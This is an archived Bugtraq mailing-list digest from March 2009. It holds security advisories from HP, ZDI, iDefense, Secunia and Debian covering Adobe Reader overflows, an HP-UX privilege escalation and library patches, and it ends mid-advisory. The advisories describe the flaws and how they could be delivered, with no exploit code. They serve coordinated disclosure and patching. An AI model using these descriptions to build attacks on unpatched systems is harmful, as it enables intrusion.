"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."
�Copyright 2009 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1
iQA/AwUBSceOmOAfOvwtKn1ZEQJOAACghShtkjftdslmj5MWAUiGqCRbUaQAn21b
Z6S+BrYMySq2fFzDIjmLxkCS
=dlUm
-----END PGP SIGNATURE-----
From - Tue Mar 24 14:42:49 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006c30
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39828-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 56F22ED46E
for <lists@securityspace.com>; Tue, 24 Mar 2009 14:40:35 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 1D88C1437E6; Tue, 24 Mar 2009 11:35:35 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 3568 invoked from network); 24 Mar 2009 16:49:46 -0000
From: ZDI Disclosures <zdi-disclosures@tippingpoint.com>
To: FD <full-disclosure@lists.grok.org.uk>,
bugtraq <bugtraq@securityfocus.com>
Cc: ZDI Disclosures <zdi-disclosures@tippingpoint.com>
Date: Tue, 24 Mar 2009 11:51:37 -0500
Subject: ZDI-09-014: Adobe Acrobat getIcon() Stack Overflow Vulnerability
Thread-Topic: ZDI-09-014: Adobe Acrobat getIcon() Stack Overflow
Vulnerability
Thread-Index: AcmsoMvBCpDaWBiUEd6+ogAbY6UoyQ=Message-ID: <C5EE79C9.15991%zdi-disclosures@tippingpoint.com>
Accept-Language: en-US
Content-Language: en
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
acceptlanguage: en-US
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
MIME-Version: 1.0
Status:
ZDI-09-014: Adobe Acrobat getIcon() Stack Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-014
March 24, 2009
-- CVE ID:
CVE-2009-0927
-- Affected Vendors:
Adobe
-- Affected Products:
Adobe Acrobat
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 6255.
For further product information on the TippingPoint IPS, visit:
http://www.tippingpoint.com
-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Adobe Acrobat and Adobe Reader. User
interaction is required in that a user must visit a malicious web site
or open a malicious file.
The specific flaw exists when processing malicious JavaScript contained
in a PDF document. When supplying a specially crafted argument to the
getIcon() method of a Collab object, proper bounds checking is not
performed resulting in a stack overflow. If successfully exploited full
control of the affected machine running under the credentials of the
currently logged in user can be achieved.
-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:
http://www.adobe.com/support/security/bulletins/apsb09-04.html
-- Disclosure Timeline:
2008-07-03 - Vulnerability reported to vendor
2009-03-24 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Tenable Network Security
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
From - Tue Mar 24 16:52:51 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006c31
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39829-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id C314FED8AF
for <lists@securityspace.com>; Tue, 24 Mar 2009 16:44:22 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id AA26C143854; Tue, 24 Mar 2009 11:38:09 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 5074 invoked from network); 24 Mar 2009 18:14:08 -0000
To: bugtraq@securityfocus.com
From: security-alert@hp.com
Subject: [security bulletin] HPSBUX02409 SSRT080171 rev.1 - HP-UX Running VERITAS File System (VRTSvxfs) or VERITAS Oracle Disk Manager (VRTSodm), Local Escalation of Privilege
Date: Tue, 24 Mar 2009 11:16:11 -0700
Sender: secure@hpchs.cup.hp.com
Message-Id: <20090324181611.C1B4EBF5A@hpchs.cup.hp.com>
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01674733
Version: 1
HPSBUX02409 SSRT080171 rev.1 - HP-UX Running VERITAS File System (VRTSvxfs) or VERITAS Oracle Disk Manager (VRTSodm), Local Escalation of Privilege
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2009-02-23
Last Updated: 2009-03-21
Potential Security Impact: Local escalation of privilege
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP-UX running VRTSvxfs and VRTSodm. The vulnerability could be exploited locally to cause an escalation of privilege. VRTSvxfs and VRTSodm are bundled with Storage Management Suite (SMS) and Storage Management for Oracle (SMO).
References: CVE-2009-0207
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11 running VRTSodm 3.5
HP-UX B.11.23 running VRTSodm 4.1 or VRTSvxfs 4.1 or both
HP-UX B.11.23 running VRTSodm 5.0 or VRTSvxfs 5.0 or both
HP-UX B.11.31 running VRTSodm 5.0
BACKGROUND
CVSS 2.0 Base Metrics
==============================================Reference Base Vector Base Score
CVE-2009-0207 (AV:L/AC:L/Au:S/C:C/I:C/A:C) 6.8
==============================================Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.
RESOLUTION
HP has provided the following patches to resolve this vulnerability.
The patches are available from the following location:
URL:
http://itrc.hp.com
HP-UX Release
Component from bundle
Patch ID
B.11.11
VRTSvxfs 3.5
PHCO_39124
B.11.23 (IA and PA)
VRTSvxfs 4.1, VRTSodm 4.1
PHCO_39027, PHKL_39029
B.11.23 (IA and PA)
VRTSvxfs 5.0, VRTSodm 5.0
PHCO_39103, PHCO_39104, PHKL_38795
B.11.31
VRTSodm 5.0
PHKL_39130
B.11.31
VRTSvxfs 5.0
PHCO_38913, PHCO_39132
MANUAL ACTIONS: No
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11
=================VRTSvxfs.VXFS-RUN
action: install patches PHCO_39124 or subsequent
URL:
http://itrc.hp.com
For VRTSvxfs 4.1, VRTSodm 4.1
HP-UX B.11.23
=================VRTSodm.ODM-KRN
VRTSodm.ODM-RUN
VRTSodm.ODM-MAN
VRTSvxfs.VXFS-RUN
VRTSvxfs.VXFS-RUN-PALIB
VRTSvxfs.VXFS-PRG
action: install patches PHCO_39027, PHKL_39029 or subsequent
URL:
http://itrc.hp.com
For VRTSodm 5.0 and VRTSvxfs 5.0
HP-UX B.11.23
=================VRTSodm.ODM-KRN
VRTSodm.ODM-RUN
VRTSodm.ODM-MAN
VRTSvxfs.VXFS-RUN
VRTSvxfs.VXFS-RUN-PALIB
VRTSvxfs.VXFS-PRG
action: install patches PHCO_39103, PHCO_39104, PHKL_38795 or subsequent
URL:
http://itrc.hp.com
HP-UX B.11.31
=================VRTSodm.ODM-KRN
VRTSodm.ODM-RUN
VRTSodm.ODM-MAN
VRTSvxfs.VXFS-RUN
action: install patches PHCO_38913, PHCO_39132, PHKL_39130 or subsequent
URL:
http://itrc.hp.com
END AFFECTED VERSIONS
HISTORY
Version:1 (rev.1) 23 March 2009 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For further information, contact normal HP Services support channel.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
To: security-alert@hp.com
Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
- check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
- verify your operating system selections are checked and save.
To update an existing subscription:
http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.
To review previously published Security Bulletins visit:
http://www.itrc.hp.com/service/cki/secBullArchive.do
* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."
�Copyright 2009 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1
iQA/AwUBScja3eAfOvwtKn1ZEQLomgCffgw+V+B3Y8BwMdA/V4b6olPeIvUAnRjL
suM6zASihIRJbJkjnPp2QFW+
=WIrL
-----END PGP SIGNATURE-----
From - Tue Mar 24 17:42:49 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006c32
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39831-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 4CA92ED8B2
for <lists@securityspace.com>; Tue, 24 Mar 2009 17:35:31 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 4B70023744E; Tue, 24 Mar 2009 14:29:53 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 10408 invoked from network); 24 Mar 2009 21:18:31 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <jmm@inutil.org>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-policyd-weight: using cached result; rate: -6.1
Date: Tue, 24 Mar 2009 22:20:14 +0100
From: Moritz Muehlenhoff <jmm@debian.org>
Message-ID: <20090324212014.GA4996@galadriel.inutil.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.5.18 (2008-05-17)
X-SA-Exim-Connect-IP: 82.83.180.59
X-SA-Exim-Mail-From: jmm@inutil.org
X-SA-Exim-Scanned: No (on inutil.org); SAEximRunCond expanded to false
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-10.68 tagged_above=3.6 required=5.3
tests=[BAYES_00=-2, FVGT_m_MULTI_ODD=0.02, IMPRONONCABLE_2=1,
LDO_WHITELIST=-5, MURPHY_WRONG_WORD1=0.1, MURPHY_WRONG_WORD2=0.2,
PGPSIGNATURE=-5]
X-Spam-Level:
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1753-1] End-of-life announcement for Iceweasel in oldstable
Priority: urgent
Resent-Message-ID: <AYRIGoHxDtJ.A.YuH.p6UyJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Tue, 24 Mar 2009 21:20:41 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- ------------------------------------------------------------------------
Debian Security Advisory DSA-1753-1 security@debian.org
http://www.debian.org/security/ Moritz Muehlenhoff
March 24, 2009
http://www.debian.org/security/faq
- ------------------------------------------------------------------------
Package : iceweasel
As indicated in the Etch release notes, security support for the
Iceweasel version in the oldstable distribution (Etch) needed to be
stopped before the end of the regular security maintenance life cycle.
You are strongly encouraged to upgrade to stable or switch to a still
supported browser.
On a side note, please note that the Debian stable/Lenny version of
Iceweasel - the unbranded version of the Firefox browser - links
dynamically against the Xulrunner library. As such, most of the
vulnerabilities found in Firefox need only be fixed in the Xulrunner
package and don't require updates to the Iceweasel package any longer.
- ------------------------------------------------------------------------
Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iEYEARECAAYFAknJTk0ACgkQXm3vHE4uyloEewCgxBSva03+zoz5H1vIKhxwXFGS
Bf8AoJQAvTeBN9KAo4v50cwEa4LgT57S
=gle/
-----END PGP SIGNATURE-----
From - Tue Mar 24 18:12:49 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006c34
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39830-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 6BC9CED8B5
for <lists@securityspace.com>; Tue, 24 Mar 2009 18:07:45 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 0D7541438CA; Tue, 24 Mar 2009 13:12:13 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 8109 invoked from network); 24 Mar 2009 19:47:42 -0000
Message-ID: <49C938EC.80005@idefense.com>
Date: Tue, 24 Mar 2009 14:47:56 -0500
From: iDefense Labs <labs-no-reply@idefense.com>
User-Agent: Thunderbird 2.0.0.21 (Windows/20090302)
MIME-Version: 1.0
To: vulnwatch@vulnwatch.org, full-disclosure@lists.grok.org.uk,
bugtraq@securityfocus.com
Subject: iDefense Security Advisory 03.24.09: Adobe Reader and Acrobat JBIG2
Encoded Stream Heap Overflow Vulnerability
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Status:
iDefense Security Advisory 03.24.09
http://labs.idefense.com/intelligence/vulnerabilities/
Mar 24, 2009
I. BACKGROUND
Adobe Acrobat Reader/Acrobat are programs for viewing and editing
Portable Document Format (PDF) documents. For more information, see the
vendor's site found at the following link.
http://www.adobe.com/products/reader/
http://www.adobe.com/products/acrobatpro/
II. DESCRIPTION
Remote exploitation of a heap based buffer overflow vulnerability in
Adobe Systems Inc.'s Reader and Acrobat could allow an attacker to
execute arbitrary code with the privileges of the current user.
The vulnerability occurs when parsing a JBIG2-encoded stream inside of a
PDF file. JBIG2 is an image encoding format that is primarily used for
encoding monochrome images such as faxes.
When parsing the contents of a JBIG2 stream, a 32-bit value that
represents the number of values in a table is used to allocate a heap
buffer. This buffer is then filled with values from the file, without
properly checking the bounds of the buffer. This leads to a heap based
buffer overflow that can result in arbitrary code execution.
III. ANALYSIS
Exploitation of this vulnerability allows the attacker to execute
arbitrary code with the privileges of the user opening the file. The
attacker will have to create a malicious PDF file and convince the
victim to open it. This can be accomplished by embedding the PDF file
into an iframe inside of a Web page, which will result in automatic
exploitation once the page is viewed. The file could also be e-mailed
as an attachment or placed on a file share. In these cases, a user
would have to manually open the file to trigger exploitation.
Typically, heap based buffer overflows can be difficult to exploit due
to modern heap implementations that perform heap integrity checks.
However, Abode Reader and Acrobat use a custom heap allocator which can
be abused to write arbitrary values to arbitrary locations. Labs testing
has demonstrated this vulnerability is highly exploitable.
JavaScript is not required to exploit this vulnerability, however, it
does make exploitation simpler.
IV. DETECTION
Acrobat Reader and Acrobat Professional versions 7.1.0, 8.1.3, 9.0.0 and
prior versions are vulnerable.
V. WORKAROUND
None of the following workarounds will prevent exploitation, but they
can reduce potential attack vectors and make exploitation more
difficult.
Prevent PDF documents from being opened automatically by the Web browser.
Disable JavaScript in the vulnerable products.
Follow best practice methodologies by avoiding opening files from
untrusted or unsolicited sources.
Deploy DEP (Data Execution Prevention).
VI. VENDOR RESPONSE
Adobe has released a patch which addresses this issue. For more
information, consult their advisory (APSB09-04) at the following URL:
http://www.adobe.com/support/security/bulletins/apsb09-04.html
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2009-0928 to this issue. This is a candidate for inclusion in
the CVE list (
http://cve.mitre.org/), which standardizes names for
security problems.
VIII. DISCLOSURE TIMELINE
02/24/2009 - Initial Contact
02/24/2009 - Initial Response
02/24/2009 - PoC Requested
02/25/2009 - PoC Sent
03/06/2009 - Status update received - proposed release date of 03/18/2009
03/17/2009 - Vendor proposes new release date of 03/24/2009
03/24/2009 - Coordinated public disclosure
IX. CREDIT
This vulnerability was discovered by Sean Larsson, iDefense Labs.
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com/
X. LEGAL NOTICES
Copyright � 2009 iDefense, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
From - Wed Mar 25 12:22:49 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006c83
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39833-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 074E4EC15F
for <lists@securityspace.com>; Wed, 25 Mar 2009 12:12:57 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id B4C98236F50; Wed, 25 Mar 2009 08:50:26 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 25467 invoked from network); 25 Mar 2009 09:36:00 -0000
Date: Wed, 25 Mar 2009 10:22:05 +0100
Message-Id: <200903250922.n2P9M5l6016676@ca.secunia.com>
To: bugtraq@securityfocus.com
Subject: Secunia Research: Adobe Reader JBIG2 Symbol Dictionary Buffer Overflow
From: Secunia Research <remove-vuln@secunia.com>
Status:
=====================================================================
Secunia Research 25/03/2009
- Adobe Reader JBIG2 Symbol Dictionary Buffer Overflow -
=====================================================================Table of Contents
Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10
=====================================================================1) Affected Software
* Adobe Reader versions 8.1.3 and 9.0.0
NOTE: Other versions may also be affected.
=====================================================================2) Severity
Rating: Highly critical
Impact: System access
Where: Remote
=====================================================================3) Vendor's Description of Software
"Adobe Reader software is the global standard for electronic document
sharing. It is the only PDF file viewer that can open and interact
with all PDF documents."
Product Link:
http://www.adobe.com/products/reader/
=====================================================================4) Description of Vulnerability
Secunia Research has discovered a vulnerability Adobe Reader, which
can be exploited by malicious people to compromise a user's system.
The vulnerability is caused due to a boundary error in the processing
of JBIG2 streams. This can be exploited to cause a heap-based buffer
overflow via a specially crafted PDF file containing a malformed
JBIG2 symbol dictionary segment.
Successful exploitation may allow execution of arbitrary code.
=====================================================================5) Solution
Update to version 7.1.1, 8.1.4, or 9.1.
=====================================================================6) Time Table
06/03/2009 - Vendor notified.
07/03/2009 - Vendor response.
25/03/2009 - Public disclosure.
=====================================================================7) Credits
Discovered by Alin Rad Pop, Secunia Research.
=====================================================================8) References
The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2009-0193 for the vulnerability.
=====================================================================9) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:
http://secunia.com/advisories/business_solutions/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/advisories/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://secunia.com/secunia_research/
Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:
http://secunia.com/corporate/jobs/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/advisories/mailing_lists/
=====================================================================10) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2009-14/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
=====================================================================
From - Wed Mar 25 12:32:49 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006ca5
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39834-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 7BCE1EC15F
for <lists@securityspace.com>; Wed, 25 Mar 2009 12:32:30 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id B41092370FB; Wed, 25 Mar 2009 08:50:40 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 26982 invoked from network); 25 Mar 2009 11:30:27 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <white@debian.org>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-policyd-weight: DYN_NJABL=ERR NOT_IN_SBL_XBL_SPAMHAUS=-1.5 NOT_IN_BL_NJABL=-1.5 DSBL_ORG=ERR CL_IP_EQ_HELO_MX=-3.1 (check from: .debian. - helo: .apu.snow-crash. - helo-domain: .snow-crash.) FROM/MX_MATCHES_NOT_HELO(DOMAIN)=0 <clientx.47.227.179> <helo=apu.snow-crash.org> <from=white@debian.org> <to�bian-security-announce@lists.debian.org>, rate: -6.1
Message-Id: <20090325113218.C6B23B90112@hannah.localdomain>
Date: Wed, 25 Mar 2009 22:32:18 +1100 (EST)
From: white@debian.org (Steffen Joeris)
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-9.06 tagged_above=3.6 required=5.3
tests=[BAYES_00=-2, FOURLA=0.1, FVGT_m_MULTI_ODD=0.02,
IMPRONONCABLE_2=1, LDO_WHITELIST=-5, MURPHY_DRUGS_REL8=0.02,
MURPHY_WRONG_WORD1=0.1, MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5,
PHONENUMBER=1.5]
X-Spam-Level:
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1745-2] New lcms packages fix regression
Priority: urgent
Resent-Message-ID: <n0g4mU-0IdG.A.6sD.aZhyJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Wed, 25 Mar 2009 11:32:42 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- ------------------------------------------------------------------------
Debian Security Advisory DSA-1745-2 security@debian.org
http://www.debian.org/security/ Steffen Joeris
March 25, 2009
http://www.debian.org/security/faq
- ------------------------------------------------------------------------
Package : lcms
Vulnerability : several vulnerabilities
Problem type : local (remote)
Debian-specific: no
CVE Ids : CVE-2009-0581 CVE-2009-0723 CVE-2009-0733
This update fixes a possible regression introduced in DSA-1745-1 and
also enhances the security patch. For reference the original advisory
text is below.
Several security issues have been discovered in lcms, a color management
library. The Common Vulnerabilities andi Exposures project identifies
the following problems:
CVE-2009-0581
